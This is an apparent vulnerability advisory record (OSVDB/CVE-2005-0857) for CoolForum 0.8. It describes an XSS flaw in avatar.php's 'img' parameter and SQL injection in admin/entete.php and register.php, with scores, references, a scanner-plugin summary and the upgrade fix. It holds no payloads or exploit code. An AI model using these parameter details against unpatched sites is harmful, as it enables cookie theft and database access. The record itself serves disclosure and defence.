ID: OSVDB:14951
Type: osvdb
Reporter: Romano (romano_45@hotmail.com)
Modified: 2005-03-17T19:47:52
Description
Vulnerability Description
CoolForum contains a flaw that allows a remote cross-site scripting attack. The flaw exists because the application does not validate the 'img' variable when it is submitted to the 'avatar.php' script. This could allow a user to create a specially crafted URL that would execute arbitrary script in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Solution Description
Upgrade to version 0.8.1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Record metadata
Source: https://vulners.com/osvdb/OSVDB:14951
Title: CoolForum avatar.php img Variable XSS
Published: 2005-03-17T19:47:52
Affected software: CoolForum 0.8
CVSS v2: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Vulners score: 5.1 (modified 2017-04-28T13:20:11)
CVE: CVE-2005-0857
Nessus plugin: COOLFORUM_XSS_SQL.NASL

References
Vendor URL: http://www.coolforum.net/
Security Tracker: 1013474
Related OSVDB ID: 14953 (https://vulners.com/osvdb/OSVDB:14953)
Related OSVDB ID: 14952 (https://vulners.com/osvdb/OSVDB:14952)
ISS X-Force ID: 19758
CVE-2005-0857 (https://vulners.com/cve/CVE-2005-0857)
Bugtraq ID: 12852
Related records

CVE-2005-0857 (NVD; published 2005-05-02, modified 2017-07-11)
Cross-site scripting (XSS) vulnerability in avatar.php for CoolForum 0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the img parameter.
CVSS v2: 4.3 MEDIUM (AV:N/AC:M/Au:N/C:N/I:P/A:N); exploitability subscore 8.6, impact subscore 2.9
CPE: cpe:/a:coolforum:coolforum:0.8
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0857

Nessus plugin 17597: CoolForum Multiple Vulnerabilities (SQLi, XSS)
Plugin file: COOLFORUM_XSS_SQL.NASL; published 2005-03-22; covers CVE-2005-0857 and CVE-2005-0858
https://www.tenable.com/plugins/nessus/17597
The remote host is running a version of CoolForum that suffers from multiple input validation vulnerabilities.
- Multiple SQL Injection Vulnerabilities: due to a failure to properly sanitize user input supplied through the 'pseudo' parameter of the 'admin/entete.php' script and the 'ilogin' parameter of the 'register.php' script, an attacker may be able to manipulate SQL queries and view arbitrary database contents, provided PHP's 'magic_quotes_gpc' setting is disabled.
- A Cross-Site Scripting Vulnerability: it is possible to inject arbitrary script and HTML code into the 'img' parameter of the 'avatar.php' script.
An attacker can exploit these flaws to cause code to run on a user's browser within the context of the remote site, enabling him to steal authentication cookies, access data recently submitted by the user, and the like.
Solution: Upgrade to CoolForum version 0.8.1 or later.
See also: http://securitytracker.com/alerts/2005/Mar/1013474.html
CVSS v2: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
The plugin's NASL source is published at the Tenable URL above. It first confirms that the site's index.php reports "Powered by CoolForum", then checks the admin/entete.php and register.php SQL injection issues and whether the 'img' parameter of avatar.php is reflected unescaped; per the plugin's own comments, the SQL injection checks require PHP's magic_quotes_gpc to be off and the XSS check requires PHP's display_errors to be enabled.